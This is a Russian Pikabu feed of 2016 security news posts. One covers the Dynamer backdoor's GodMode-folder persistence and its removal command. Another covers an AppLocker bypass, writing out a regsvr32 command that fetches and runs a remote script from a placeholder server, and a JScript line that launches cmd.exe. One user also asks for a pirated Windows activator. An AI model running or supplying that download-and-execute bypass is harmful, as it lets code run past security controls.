Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
#Круги добра
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Я хочу получать рассылки с лучшими постами за неделю
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
Создавая аккаунт, я соглашаюсь с правилами Пикабу и даю согласие на обработку персональных данных.
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam
Пикабу Игры +1000 бесплатных онлайн игр Испытайте захватывающие сражения Второй мировой войны: быстрые бои, огромный арсенал, настройка, танки и стратегия на разнообразных картах!

Warfare 1942 - онлайн шутер

Мультиплеер, Шутер, Мидкорные

Играть

Топ прошлой недели

  • AlexKud AlexKud 38 постов
  • Animalrescueed Animalrescueed 36 постов
  • Oskanov Oskanov 7 постов
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая кнопку «Подписаться на рассылку», я соглашаюсь с Правилами Пикабу и даю согласие на обработку персональных данных.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Помощь Кодекс Пикабу Команда Пикабу Моб. приложение
Правила соцсети О рекомендациях О компании
Промокоды Биг Гик Промокоды Lamoda Промокоды МВидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
0 просмотренных постов скрыто
1910
BOMBERuss
BOMBERuss
9 лет назад

Хакеры эксплуатируют "пасхалку" в WINDOWS для внедрения вирусни⁠⁠

Специалисты McAfee Labs обнаружили новое семейство малвари — Dynamer. Авторы вредоноса используют для атак секретную функцию «режим бога» (GodMode), которая впервые появилась в операционных системах Microsoft во времена Windows Vista.
Хакеры эксплуатируют "пасхалку" в WINDOWS для внедрения вирусни Длиннопост, Хакеры, Взлом, Заражение, Режим бога, Вирус, Windows

О существовании функции GodMode известно давно. Чтобы активировать «режим бога» в Windows, нужно осуществить всего пару простых операций. Необходимо создать на рабочем столе новую папку с именем вида GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}. «GodMode» при этом можно заменить любым другим набором символов, а вот дальнейшую последовательность изменять нельзя.


В созданной папке будут отображаться все доступные пользователю настройки ОС, в том числе и те, которые не входят в меню «Панели управления» и «Параметров». Предполагается, что это не просто «пасхалка», а функция, которую разработчики Microsoft используют для дебаггинга.


Исследователи McAfee Labs обнаружили, что бекдор Dynamer использует GodMode для атак. Чтобы закрепиться в системе, малварь создает в реестре Windows запись, благодаря которой вредоносный процесс стартует при каждом запуске системы. Запись в реестре выглядит следующим образом:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

lsm = C:\Users\admin\AppData\Roaming\com4.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}\lsm.exe


Dynamer помещается в папку com4, внутри %AppData%. Данная запись в реестре использует чуть измененную версию «режима бога», что позволяет малвари нормально функционировать, но если попытаться открыть папку com4.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}, произойдет автоматическая переадресации в RemoteApp and Desktop Connections.

Хакеры эксплуатируют "пасхалку" в WINDOWS для внедрения вирусни Длиннопост, Хакеры, Взлом, Заражение, Режим бога, Вирус, Windows

Как можно заметить, путь GodMode немного изменен, чтобы указывать непосредственно на RemoteApp and Desktop Connections. Замена имени «GodMode» на «com4» обусловлена желанием хакеров остаться в системе навсегда. Именно из-за этого нюанса от Dynamer крайне трудно избавиться.


«Использовать такое имя в нормальном Windows Explorer и cmd.exe запрещено. Операционная система будет относиться к такой папке как к устройству, что помешает пользователю удалить данную директорию через “Проводник” или командную строку», — поясняет Крейг Шмугар (Craig Schmugar).

Хакеры эксплуатируют "пасхалку" в WINDOWS для внедрения вирусни Длиннопост, Хакеры, Взлом, Заражение, Режим бога, Вирус, Windows
Хакеры эксплуатируют "пасхалку" в WINDOWS для внедрения вирусни Длиннопост, Хакеры, Взлом, Заражение, Режим бога, Вирус, Windows

Специалисты McAfee Labs всё же придумали способ избавления от вредоносной папки. Для этого понадобится выполнить команду:


> rd “\\.\%appdata%\com4.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}” /S /Q

McAfee Labs https://blogs.mcafee.com/mcafee-labs/malware-takes-advantage...

Пост https://xakep.ru/2016/04/29/windows-godmode/

Показать полностью 3
Длиннопост Хакеры Взлом Заражение Режим бога Вирус Windows
191
1351
BOMBERuss
BOMBERuss
9 лет назад

Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ⁠⁠

Независимый исследователь Кейси Смит (Casey Smith) обнаружил интересный способ обхода средства безопасности Windows AppLocker. Техника Смита не требует привилегий администратора. Всё, что понадобится для атаки, это лишь короткая команда, код которой уместится даже в один твит.
Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ Взлом, Windows, Хакеры, Команда, Обход, Защита, Безопасность, Длиннопост

Windows AppLocker впервые появился в системах Microsoft с релизом Windows Server 2008 R2 и Windows 7. По сути, эта функция позволяет администратору задавать определенные правила для приложений, определяя, что может и чего не может запустить пользователь (или группа пользователей). К примеру, можно запретить запуск на компьютере любых программ, которые не относятся к рабочей деятельности сотрудника.


Тогда как администраторы привыкли доверять AppLocker, Кейсти Смит пишет, что обойти его ограничения возможно, более того, проделать это весьма легко.


Фактически Смит предложил использовать не по назначению Regsvr32 и с его помощью скачать из интернета определенный файл. Для этого потребуется команда вида:


regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll


Исполнение этой команды приведет к скачиваю XML-файла, который приведет к запуску cmd.exe. Кроме того, cmd.exe можно заменить на любую другую программу, и не важно, какие ограничения установлены в AppLocker: программа всё равно успешно запустится.


Как это работает? Regsvr32 является частью ОС и может использоваться для регистрации или отмены регистрации файлов COM скриптов в реестре Windows. Если разбирать команду Смита: /s в коде обязывает Regsvr32 работать тихо, /n приказывает не использовать DllRegisterServer, /u означает, что мы пытаемся осуществить отмену регистрации, а параметр /i отвечает за ссылку и DLLinstall. В свою очередь, scrobj.dll – это Script Component Runtime.


Смит обнаружил, что Regsvr32 обработает URL и доставит на машину заданный файл через HTTP или HTTPS. Исследователь добавил немного JavaScript к своему XML-файлу и инициировал его исполнение через запрос на отмену регистрации .DLL. Таким образом, обход AppLocker становится весьма простым трюком, веь любой пользователь может отправить запрос на отмену регистрации.


«Это не слишком задокументированная [функция], но regsvr32.exe может принять ссылку на скрипт. Чтобы уязвимость сработала, поместите код (VB или JS) внутрь элемента <registration>», — пишет Смит.

Так, в описанном выше примере JavaScript использует ActiveX:


var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");


Атака Смита не требует привилегий администратора, может быть выдана за обычную сессию HTTP, и не должна оставить ни единого следа на жестком диске жертвы, так как не затрагивает реестр и работает непосредственно с памятью. Никаких патчей на данный момент не существует, разве что Regsvr32 можно отрезать от интернета при помощи файервола.


Исследователь опубликовал на GitHub свой proof-of-concept, который может пригодиться системным администраторам и пентестерам.

Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ Взлом, Windows, Хакеры, Команда, Обход, Защита, Безопасность, Длиннопост

Материалы:

Windows AppLocker https://technet.microsoft.com/ru-ru/library/ee424367.aspx

Кейсти Смит пишет об обходе http://subt0x10. блогспот .ru/2016/04/bypass-application-whitelisting-script.html

Regsvr32 https://technet.microsoft.com/en-us/library/bb490985.aspx

XML-файл запускающий cmd.exe https://gist.githubusercontent.com/subTee/24c7d8e1ff0f560209...

Как параметр /i отвечает за ссылку и DLLinstall https://msdn.microsoft.com/en-us/library/windows/desktop/bb7...

Proof-of-conceptна исследователя на GitHub https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d...

Пруф https://xakep.ru/2016/04/22/applocker-bypass/

Показать полностью 1
Взлом Windows Хакеры Команда Обход Защита Безопасность Длиннопост
82
13
Guardo
9 лет назад

Microsoft предупредит пользователей о внимании со стороны властей⁠⁠

Microsoft сообщила о некоторых изменениях в политике безопасности персональных данных пользователей. Теперь если компания обнаружит попытку взлома учётной записи пользователя, она не только предупредит пользователя об этом как ранее, но и уточнит кто может стоять за этой атакой: простые хакеры или спецслужбы местных властей.


Соответствующее предупреждение пользователи получат, как только сервисы Microsoft обнаружат попытку атаки на учётную запись (в том числе используемую для Outlook.com и OneDrive, например). Это не значит, что ваша учётная запись уже скомпрометирована: просто к вам уже проявляют внимание, вы стали чьей-то целью.


Источник: blogs.microsoft.com

Microsoft Windows Windows 10 Взлом Забота Текст
5
24
korjeek
korjeek
10 лет назад

Безопасности пост⁠⁠

Безопасности пост
Показать полностью 1
Взлом Вирус Безопасность Галактика в опасности Из сети Софт Windows Длиннопост
19
4733
BaDDoktor
BaDDoktor
10 лет назад

Смотри мама я "хакер"!⁠⁠

Или как взломать большинство паролей.
Смотри мама я &quot;хакер&quot;! Или как взломать большинство паролей.
Показать полностью 1
[моё] Хакеры Взлом Пароль Windows Длиннопост
393
rod98
rod98
11 лет назад

Активация Windows 7 Максимальная⁠⁠

Здравствуйте, пикабушники.
не подскажете какой-нибудь проверенны активатор для виндоус 7? (или какой-либо другой способ обхода системы активации)
заранее спасибо
P.S. я знаю про гугл, но хотелось бы знать, с чем связываюсь
P.P.S. торрента нет :(
[моё] Взлом Windows Активация Активатор Текст
14
Посты не найдены
О нас
О Пикабу Контакты Реклама Сообщить об ошибке Сообщить о нарушении законодательства Отзывы и предложения Новости Пикабу Мобильное приложение RSS
Информация
Помощь Кодекс Пикабу Команда Пикабу Конфиденциальность Правила соцсети О рекомендациях О компании
Наши проекты
Блоги Работа Промокоды Игры Курсы
Партнёры
Промокоды Биг Гик Промокоды Lamoda Промокоды Мвидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии